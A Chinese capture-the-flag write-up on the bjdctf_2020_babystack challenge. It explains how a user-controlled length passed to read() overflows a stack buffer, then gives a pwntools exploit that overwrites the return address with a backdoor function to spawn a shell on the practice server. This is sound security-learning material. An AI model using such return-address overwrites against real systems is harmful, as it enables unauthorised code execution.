PWN手的成长之路-03-bjdctf_2020_babystack

首先nc一下远程环境，看一下他有什么功能。发现有两个输入，第一个是输入名字的长度，第二个是输入名字。

file 查看一下给的附件。是一个64位的 ELF 可执行文件。

checksec 查看文件的安全保护。得知启动了NX栈保护，其他保护都没开。

使用IDA查看文件的main函数。在打开时需要区分32位与64位，低版本的IDA，32位文件需要在IDA32中打开，但是IDA版本较高时就不用管了，32位也可以放在IDA64中打开。

查看伪代码：

发现了 scanf 这个这个高危函数。
程序流程：用户输入一个整数，并把此数存在 nbytes 变量中，再提示用户输入姓名，然后使用read函数从标准输入读取指定长度（由 nbytes 决定）的数据到 buf 数组中。

并且在函数中发现了 backdoor 这个后门函数，因此我们就需要造成程序的溢出再让其覆盖 backdoor 函数的位置，得到 shell

查看我们需要填充的字节为 0x10+8=0x18

backdoor 函数的内存地址为：0x4006E6

编写exp：

from pwn import *
r=remote('node5.buuoj.cn',29605)

backdoor_addr=0x4006E6
#ret = 0x401198

payload=b'a'*0x18+p64(backdoor_addr)
r.sendlineafter('name','123')
r.sendline(payload)
r.interactive()